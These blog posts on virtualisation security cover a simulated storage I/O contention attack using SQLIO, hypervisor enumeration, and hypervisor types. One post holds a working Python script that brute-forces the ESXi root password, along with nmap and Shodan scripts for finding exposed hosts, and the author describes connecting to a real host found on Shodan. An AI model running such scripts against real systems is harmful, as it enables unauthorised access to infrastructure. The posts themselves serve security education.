As discussed earlier, when placed on the same storage array as a number of other machines, an attacker may be able to affect the performance of those machines by requesting large amounts of disk I/O on the shared array. To demonstrate the plausibility of this attack the author conducted a simulation with two attack machines and one target machine placed on the same storage array. I will post a full description of the simulation in a separate posting. To demonstrate the disruption caused by this attack, the experiment uses the built-in monitoring tool ‘esxtop’. The figure indicated under the GAVG/cmd column will best demonstrate the impact the attack has on the storage array. This figure identifies the “response time as it is perceived by the guest operating system” by adding the “average response time in milliseconds per command being sent to the device” (DAVG/cmd) to “the amount of time the command spends in the VMkernel” (KAVG/cmd).

The simulation used three machines to demonstrate this process: two representing the machines controlled by the attacker and one the victim machine. Both of the attacking machines run a freely available Microsoft SQL I/O stress testing/benchmarking utility named “SQLIO”. To simulate high I/O the author initiates the utility using the parameters shown in the snippet below.

“sqlio -kW -s10 -frandom -o8 -b8 -LS -Fparam.txt

sqlio -kR -s360 -frandom -o8 -b8 -LS -Fparam.txt…”

The ‘-frandom’ parameter in the SQLIO utility generates random reads and writes rather than sequential ones, as random disk activity is known to be more intensive on storage devices (Kelkar, 2011). This resulted in the number of read operations on one of the attacking machines rising to a consistent rate of 5323.41 commands per second, causing the GAVG to rise from zero to 82.31 milliseconds on the attacking machine and from zero to 47.41 ms on the victim machine. While these contention results fluctuated during the tests, the GAVG was consistently above 30 ms on both one of the attacking machines and the victim machine, as shown in Figure 1 and on the graph in Figure 2.


Figure 1 – statistics for each machine during the I/O tests

The average figures shown by the monitoring software also demonstrate the high latency experienced by each machine. To demonstrate the impact that the attack has on machine response time (GAVG), Figure 2 shows the average GAVG figure reported by each VM before the script was run and then for the following 5 minutes. The graph shows that the average GAVG before the script was run was 0 ms, but once the script was initiated this figure increased, peaking at around 82 ms. The average response time for the victim machine throughout the 5-minute period was 46.77 ms, which is 36.77 ms above that recommended by VMware.


Figure 2 – Graph showing the average millisecond GAVG response time reported for each guest OS during the testing

This graph demonstrates that it is possible for an attacker with machines located on the same shared storage array as their target to adversely affect the performance of other machines through oversubscription of the hardware.

 

Sources:

Ristenpart, T., Tromer, E., Shacham, H. & Savage, S., 2009. Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party Compute Clouds. [Online]  Available at: http://cseweb.ucsd.edu/~hovav/dist/cloudsec.pdf

Cockcroft, A., 2011. Understanding and using Amazon EBS – Elastic Block Store. [Online]  Available at: http://perfcap.blogspot.co.uk/2011/03/understanding-and-using-amazon-ebs.html

Perrin, C., 2008. The CIA Triad. [Online] Available at: http://www.techrepublic.com/blog/security/the-cia-triad/488

Osvik, D. A., Shamir, A. & Tromer, E., 2005. Cache Attacks and Countermeasures: the Case of AES. Rehovot: Department of Computer Science and Applied Mathematics.

 





Attacking the hypervisor

27 11 2013

The hypervisor has the disadvantage of being open to attack in one of two ways: from the network layer or from a guest running on that hypervisor. The default behaviour of a hypervisor on a network is to respond to connections over standard TCP/IP, much the same as other desktop machines, devices and infrastructure. This results in the hypervisor being locatable on the network and consequently susceptible to traditional network enumeration tools such as Nmap (nmap.org, 2012) and Nessus (Tenable, 2012). While enumeration tools are primarily used as a discovery mechanism, they are often able to extract further information about a system by analysing characteristics and information returned by the host. An example of this technique using the most widely used enumeration tool (Nmap) is the ‘-O’ switch, which compares the host’s packet responses against a large database of software. Once this extra information about the host has been identified, additional approaches can be used to cross-examine the host further and identify attributes such as patch levels and service packs. Depending on the software that is found, the attacker is then able to determine the appropriate CVEs (Common Vulnerabilities and Exposures) that the host may be vulnerable to. After the vulnerabilities have been identified, the attacker is able to exploit the system and insert a payload to further control the host and maintain access. Current examples of software that can be used to exploit systems and insert malicious payloads are Metasploit (Metasploit, 2012) and CORE Impact (Core Security, 2012). This method of enumeration and exploitation will already be familiar to security staff responsible for scanning traditional clients, as it is identical.

It is the second method, attacking the hypervisor from the guest or virtual machine, that is much more dangerous and a far less familiar concept, especially for companies invested in cloud computing or hosting servers in large datacentres.

The term virtual machine (VM) escape refers to breaking out of an isolated VM in order to execute malicious code on the host. There have been a number of vulnerabilities in both Type 1 and Type 2 hypervisors that demonstrate this concept of escape (CVE-2009-1244, CVE-2011-1751, CVE-2012-0217 (Xen, 2012), CVE-2012-3288). While the danger of ‘Type 2’ hypervisor escape is still a threat, the implications of breaking out of a guest running on an enterprise ‘Type 1’ hypervisor such as ESXi or the Xen hypervisor would be much greater, due to the environments they are often employed in. In traditional networks, security can often be achieved through the segmentation of networks, either physically or virtually. This segmentation is still applicable within virtual networks; however it only offers security at the network layer, rather than at this new layer of ‘guest–host’ exploitation. While this might sound like an unlikely threat, HA features found in VMMMs, such as VMware’s DRS (Distributed Resource Scheduler), mean the movement of machines across hypervisors is often determined by the management server rather than by a human, unless specific rules are created by the administrators. This dynamic movement of virtual machines has the potential to result in an unpatched, publicly addressable server being hosted on the same hypervisor/hardware as domain controllers and other high-value target machines. This threat is certainly a cause for concern when considering mid to large size networks hosting tens to hundreds of machines within the same infrastructure separated by VLANs. The implications and likelihood of this attack are greatly increased when considering multi-tenant public cloud infrastructures. The topic of how hackers could start to rent hosted machines on public clouds to attack other machines will be covered at a later date, but in the author’s opinion this could become an actual threat that needs to be considered during a company’s risk analysis process.

There are a number of methods of assessing the security of virtual environments; one of the tools recently developed to assist in the evaluation of virtual environments is the VASTO project (Virtualization Assessment Toolkit) (Criscione, et al., 2012). The VASTO project is essentially a collection of Metasploit modules written to query and attack virtual environments, mainly the VMware platform. The modules are added to the Metasploit project to leverage an already established and robust framework.

As highlighted earlier, hypervisors are often located on the same subnet as the rest of the servers and, in some cases, the clients. This means that if an attacker is able to gain access to a network that can communicate with the hypervisor, due to placement or incorrectly configured ACLs (Access Control Lists), the hypervisor can be attacked directly. Shown in the following example are three simple methods that can be used to locate and query a hypervisor in order to retrieve important information such as version, build number and the vulnerabilities it is susceptible to.

For this demonstration, the author is using a laptop wired into the 192.168.20.0 network in a test environment. Shown in Figure 1, the author uses an NMAP command with the ‘-sV’ switch to scan the entire subnet to return a list of live hosts and associated services. The scan correctly identifies both of the ESXi servers located on the network.

Figure 1- Section of results from an NMAP scan “nmap –sV –T 192.168.20.0/24”

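The same service scan can also be scripted. The sketch below uses the python-nmap wrapper (which requires a local nmap installation) and is roughly equivalent to running “nmap -sV 192.168.20.0/24”; the subnet is the one used in this test environment.

# Scan the subnet for live hosts and identify the services (and products) they expose.
import nmap

scanner = nmap.PortScanner()
scanner.scan(hosts="192.168.20.0/24", arguments="-sV")

for host in scanner.all_hosts():
    for proto in scanner[host].all_protocols():
        for port, svc in sorted(scanner[host][proto].items()):
            product = svc.get("product") or svc.get("name")
            print(f"{host}:{port} {product} {svc.get('version', '')}")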

As shown in Figure 1, Nmap returns results showing that ESXi is installed on two IP addresses on the 192.168.20.0 subnet and has several open ports. While Nmap does identify the product and version correctly on this occasion, it is not always completely reliable in returning the exact version of the software running on the host. To do this there are a number of methods, including VASTO, Nessus and OpenVAS. Using the “vmware_version” module found in VASTO (shown in Figure 2), we are able to detect the exact version of the host, including build number.


Figure 2 – Section of results from VASTO vmware_version scan

This now gives the attacker the information needed to locate existing exploits against this version, or even develop new exploits, depending on the value of the target. Shown in Figure 3 is a screenshot of a Nessus report generated after a scan against the IP address of the ESXi host. Nessus is an automated scanning and vulnerability assessment tool that fingerprints the host against numerous plugins in order to detect exploits that the host is vulnerable to. While the full report highlighted a number of vulnerabilities found on the host, Figure 3 shows that this particular host is vulnerable to one plugin tested – containing 3 CVEs (CVE-2012-2448, CVE-2012-2449, CVE-2012-2450).

The number of exploits and the risks associated with them are not the area being addressed in this demonstration, but rather the ability to identify the hypervisor and attack it directly. The quantity and complexity of the attacks involved in exploiting Type 1 hypervisors is currently much greater than those found against Type 2 implementations. As with any technology, as popularity grows and new features are added, the greater the likelihood that easy-to-acquire automated attacks will exist.


Figure 3 – Section of Nessus report highlighting highly rated vulnerabilities

VMware greatly increased the security of their hypervisor by replacing their ESX product with the new lightweight (smaller code footprint) ESXi, which does not include the service console within the architecture of the code (VMware, 2012). However, there are still elements within the hypervisor that continue to threaten its security. One of these is that ESXi is, by default, configured to be accessible through a browser. Clients with port 80 and 443 access to the hosts are able to reach the hypervisor directly through a browser and even use the host to download the vSphere management client. While this may be convenient, it is the author’s opinion that this ‘out of the box’ configuration lacks the fundamental security posture that should be taken with such a high-value target. An attacker with the vSphere client is able to manage the hypervisor directly once a username and password have been provided. It should also be noted that all ESXi servers are (by default) configured with the ‘root’ account, meaning that the only unknown credential required to manage the host is the root password, and it would be possible to brute-force this. Furthermore, there is a customised brute forcing tool in the VASTO suite called “vmware_login”, which allows automated dictionary or brute-force login attempts. In addition to all of these vectors, there are also existing network security issues such as MiTM (man-in-the-middle) attacks, which could expose these credentials.
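
The same dictionary attack can be scripted against the standard vSphere API. The sketch below uses pyVmomi; the host address and wordlist are assumptions, and lockout or logging policies on the target would need to be considered by a real attacker (or, more usefully, by a defender testing their own estate).

# Dictionary attack against the root account of an exposed ESXi host.
import ssl
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim

HOST = "192.168.20.10"                    # assumed ESXi management address
ctx = ssl._create_unverified_context()    # ESXi commonly presents a self-signed certificate

with open("wordlist.txt") as fh:
    for pwd in (line.strip() for line in fh):
        try:
            si = SmartConnect(host=HOST, user="root", pwd=pwd, sslContext=ctx)
        except vim.fault.InvalidLogin:
            continue                      # wrong password, try the next candidate
        print("valid root password:", pwd)
        Disconnect(si)
        break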

To demonstrate the prevalence of exposed hypervisors, the author used the online search tool Shodan (SHODAN, 2012) to search the internet for exposed ‘ESX’ hosts. In Figure 4 we can see that Shodan returned 749 results fitting that description.


Figure 4 – Results of a Shodan search for host containing the term “esx”
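
The same query can be run through Shodan’s API. The sketch below uses the official shodan Python library; the API key is a placeholder and the exact result count will obviously differ from the 749 seen at the time of writing.

# Query Shodan for hosts whose banners mention "esx".
import shodan

api = shodan.Shodan("YOUR_API_KEY")       # placeholder API key
results = api.search("esx")

print("total results:", results["total"])
for match in results["matches"][:10]:
    print(match["ip_str"], match.get("port"), (match.get("data") or "")[:60])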

While not all of the hosts returned by Shodan are active, a large number of them are still current and allow remote connections to be made over the internet. Shown in Figure 5 is a valid connection to one of the returned addresses through a web browser, showing an ESXi 5 host.


Figure 5 – Connection to the IP address of one of the hosts found by Shodan





Introduction to the hypervisor

22 11 2013

The hypervisor is arguably one of the more misunderstood concepts of virtualisation for technical professionals who are more familiar with traditional methods of computing, as it can often be viewed as simply another operating system. While the hypervisor may be a form of operating system, the implications of a successful exploit against it cannot be likened to those of a traditional network operating system. The most obvious element that distinguishes a hypervisor from a traditional operating system is the far-reaching implications that vulnerabilities in the hypervisor could have upon the entire system. There are numerous vendor hypervisor implementations, all with differing levels of associated vulnerabilities. In this post a definition of typical hypervisor implementations is given to establish a baseline of understanding before continuing into the attacks.

In its simplest form, a hypervisor is a piece of code that controls the flow of instructions between guest operating systems and the physical hardware. The hypervisor emulates the physical characteristics of the actual machine such as the processor, RAM, network cards, etc. and presents a homogeneous environment to all the guests.  There are two types of hypervisors – ‘Native’ (also known as ‘Bare Metal’ or Type 1) and ‘Hosted’ (also known as Type 2).

Native hypervisors are installed directly onto the hardware, as would be done with any traditional operating system; there are also implementations that come preinstalled in the host’s ROM. Native hypervisors benefit from having direct access to the underlying physical hardware of the host, resulting in improved performance. As these systems are not full operating systems they also have the benefit of a smaller attack surface and are therefore considered more secure.

Hosted hypervisors are installed onto an existing operating system, e.g. Windows or Linux, which is responsible for communication between the hardware and the hypervisor. This type of hypervisor is less efficient in terms of performance and security and is typically used on desktops rather than servers.

While most common ‘Type 1’ hypervisors are a fraction of the size of a typical desktop operating system such as Windows 7, the code is still an additional layer of software that is added to the total attack surface of the machine. This underlying dependence, which all hosted machines have on the hypervisor, is one of the most contested factors around virtualisation security, i.e. the ability to compromise the hypervisor and use it to ‘escape’ to other machines hosted on that software.

The security of a hypervisor is comparable to that of a standard operating system when considering its size and attack surface area. Systems such as OpenBSD and TrustedBSD allow a greater level of customisation and the ability to greatly reduce the features available for a particular task; this lower default functionality often correlates directly with better security. Hypervisor security and efficiency have typically been assessed by the number of source lines of code (SLOC) used. The core functionality of a hypervisor is to translate and schedule the flow of instructions from the guest to the hardware; anything additional to this could be described as a non-essential feature.

One example of a security-focused hypervisor is IBM’s ‘sHype’ implementation of the Xen hypervisor, whose total code is claimed to be around 2,600 lines in length. It is reported that the ESXi and KVM hypervisors were around 200,000 SLOC in 2010 (Steinberg & Kauer, 2010, p. 3), with indications that this could rise, further increasing the attack surface.